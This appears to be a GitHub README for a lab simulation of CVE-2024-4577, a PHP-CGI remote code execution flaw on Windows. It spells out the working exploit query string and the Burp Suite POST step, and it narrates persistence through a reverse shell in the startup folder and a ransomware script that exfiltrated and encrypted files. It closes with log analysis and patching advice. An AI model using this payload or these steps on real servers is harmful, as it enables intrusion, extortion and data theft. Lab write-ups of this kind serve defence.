Skip to content

Latest commit

 

History

History
44 lines (29 loc) · 2.66 KB

README.md

File metadata and controls

44 lines (29 loc) · 2.66 KB
Raw

CVE-2024-4577

Overview

CVE-2024-4577 is a security vulnerability that affects PHP servers in the following versions:

  • PHP 8.3.x (8.3.8 and earlier)
  • PHP 8.2.x (8.2.20 and earlier)
  • PHP 8.1.x (8.1.29 and earlier)
  • All versions prior to 8.0
  • Unsupported versions 7.x and 5.x

This vulnerability is a remote code execution (RCE) flaw that occurs when using PHP CGI (Common Gateway Interface) on Windows servers. The issue arises from Windows misinterpreting certain characters due to the use of "Best Fit" character mapping in some language settings. In this case, the PHP CGI module interprets malicious characters as PHP options, allowing attackers to execute malicious commands on the server.

Exploitation Process

  1. Initial Attack Vector: To exploit the vulnerability, append the following string to the URL of the vulnerable site: ?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

    Use Burp Suite to intercept this request and send it to the Repeater.

  2. Change the Request Method: Convert the intercepted request to a POST method and execute a simple PHP code, for example:

    <?php phpinfo();

Continuation of the Exploitation Process

If the vulnerability exists, the output will display information related to the PHP version.

Executing Malicious Code

Various methods can be applied depending on the attacker's objectives. My preferred method was to define an execution in the Windows startup directory using Burp Suite. I converted the reverseshell.ps1 script into an executable (exe) and placed it there.

Ransomware Deployment

Similarly, I uploaded the ransomware.ps1 file to the system and successfully exfiltrated documents, leaving behind only their encrypted versions.

Analysis Phase

Before starting the attack, it is necessary to activate the 4688 logs. Upon analyzing the 4688 security logs on my Windows machine, I found that the attack originated from Apache under XAMPP. When I checked the Access.log files, I encountered an abnormal request that returned a 200 status code, prompting me to search for this URL in my browser. I identified the vulnerability and took precautions, such as updating the PHP version or disabling the PHP CGI feature.

Security Log Examination

Since the ransomware I created was not obfuscated, my code is visible in the PowerShell logs. This shows how I encrypted the data. To recover my data, I run the encoded.ps1 file.

Conclusion

This simulation highlights the potential risks associated with CVE-2024-4577 and emphasizes the importance of securing PHP installations. Keeping PHP updated and preventing misconfigurations of CGI settings can effectively reduce such vulnerabilities.